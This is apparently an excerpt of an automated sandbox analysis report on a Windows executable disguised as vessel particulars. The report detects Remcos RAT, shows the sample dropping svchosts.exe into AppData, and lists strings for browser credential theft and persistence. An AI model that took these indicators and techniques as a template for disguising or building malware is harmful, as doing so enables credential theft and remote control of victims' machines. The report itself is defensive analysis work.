          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Users\user\AppData\Roaming\remcos\svchosts.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Users\user\AppData\Roaming\remcos\svchosts.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Users\user\AppData\Roaming\remcos\svchosts.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00402832 Sleep,GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_00402832
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040E549 GetComputerNameExW,GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,17_2_0040E549
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298701013.00000000038BF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 4300, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 1632, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 2420, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 5020, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MV OLYMPIC PROGRESS VSL PARTICULARS.exe PID: 2584, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MV OLYMPIC PROGRESS VSL PARTICULARS.exe PID: 5888, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 6932, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 4936, type: MEMORY
          Source: Yara matchFile source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.2.svchosts.exe.4107268.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.svchosts.exe.4267268.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.svchosts.exe.3cc7268.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Contains functionality to steal Chrome passwords or cookiesShow sources
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data17_2_00405622
          Contains functionality to steal Firefox passwords or cookiesShow sources
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\17_2_004057B6
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: \key3.db17_2_004057B6

          Remote Access Functionality:

          barindex
          Detected Remcos RATShow sources
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeString found in binary or memory: Remcos_Mutex_Inj
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
          Source: svchosts.exe, 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
          Source: svchosts.exe, 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
          Source: svchosts.exe, 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
          Source: svchosts.exe, 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
          Source: svchosts.exe, 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
          Source: svchosts.exe, 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
          Source: svchosts.exe, 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
          Source: svchosts.exe, 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
          Source: svchosts.exe, 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
